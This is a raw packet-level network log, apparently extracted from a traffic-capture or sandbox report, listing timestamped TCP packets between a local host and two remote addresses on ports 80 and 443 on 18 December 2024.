                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.261595011 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.261635065 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.262269020 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.262310982 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.262447119 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.263364077 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.263375998 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.263401985 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264003038 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264830112 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264842033 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264873981 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264900923 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.264961004 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.265827894 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.265841007 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.265866041 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.266917944 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.266931057 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.266968966 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.267507076 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.267519951 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.267545938 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.268359900 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.268373013 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.268395901 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.269040108 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.269079924 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.269260883 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.269903898 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.270736933 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.270750046 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.270800114 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.270836115 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.270920992 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.271689892 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.271728039 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.271795988 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.272456884 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.272511959 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.272583008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.273433924 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.273447990 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.273477077 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.274322987 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.274334908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.274368048 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.275010109 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.275053024 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.275345087 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.275995970 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.276006937 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.276046991 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.276717901 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.276757956 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.276823044 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.277682066 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.277694941 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.277728081 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.278412104 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.278460026 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.278606892 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.279284000 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.279336929 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.279606104 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.280356884 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.280404091 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.280430079 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.281030893 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.281044960 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.281066895 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.282032967 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.282043934 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.282077074 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.282710075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.282762051 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.282903910 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.283554077 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.283567905 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.283601999 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.284487009 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.284497976 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.284674883 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.285134077 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.285243988 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.285279989 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.286200047 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.286211967 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.286233902 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.286911964 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.286950111 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.286987066 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.287950039 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.287964106 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.287988901 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.288841963 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.288877964 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.288949966 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.289654970 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.289697886 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.289788008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.290451050 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.290462971 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.290488958 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.291131020 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.291181087 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.291218042 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.291954994 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.292016983 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.292285919 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.292916059 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.292927980 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.292973042 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.293778896 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.293792009 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.293879986 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.294451952 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.294617891 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.294661045 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.295409918 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.295460939 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.295505047 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.296129942 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.296169996 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.296221972 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.297399998 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.297446012 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.351558924 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.351593971 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.351634026 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.351640940 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.351691008 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.360162020 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.360193968 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.360234976 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.360241890 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.360277891 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.360284090 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.360315084 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.360321045 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.360335112 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.360351086 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.360369921 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.396327019 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.396374941 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.396459103 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.396657944 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.396693945 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.396795034 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.397481918 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.397707939 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.397831917 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.397928953 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.432255983 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.432282925 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.447568893 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.447588921 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.447603941 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.447658062 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.447695971 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.447792053 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.448525906 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.448585987 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.448662043 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.449409008 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.449445009 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.449496984 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.449845076 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.449901104 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.449976921 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.450767040 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.450838089 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.450882912 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.451639891 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.451695919 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.451961040 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.452398062 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.452445030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.452589989 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.453571081 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.453583956 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.453625917 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.454498053 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.454511881 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.454581022 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.454992056 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.455004930 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.455041885 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.455979109 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.455992937 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.456036091 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.457123041 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.457137108 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.457168102 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.457614899 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.457657099 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.458199024 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.458340883 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.458354950 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.458395004 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.459431887 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.459445953 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.459490061 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.460135937 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.460149050 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.460194111 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.460832119 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.460877895 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.461317062 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.461961985 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.461975098 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.462016106 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.462979078 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.462990999 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.463104963 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.463603020 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.463956118 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.463963985 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.464359045 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.464401960 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.464612961 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.465122938 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.465166092 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.465183973 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466160059 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466851950 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466865063 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466906071 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466947079 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.466996908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.467658043 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.467701912 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.467945099 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.468605995 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.468619108 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.468657017 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.469383955 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.469397068 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.469428062 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.470243931 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.470257998 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.470283031 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471326113 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471339941 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471368074 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471926928 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471940994 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.471981049 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.472610950 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.472851038 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.472894907 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.473575115 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.473617077 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.473710060 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.474598885 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.474612951 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.474652052 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.475328922 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.475342035 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.475364923 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.476248980 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.476262093 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.476377010 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477111101 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477123976 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477164030 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477886915 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477899075 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.477926016 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.478717089 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.478729963 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.478754044 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.479408026 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.479456902 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.479546070 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.480459929 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:19.480473042 CET8049776139.99.188.124192.168.2.6
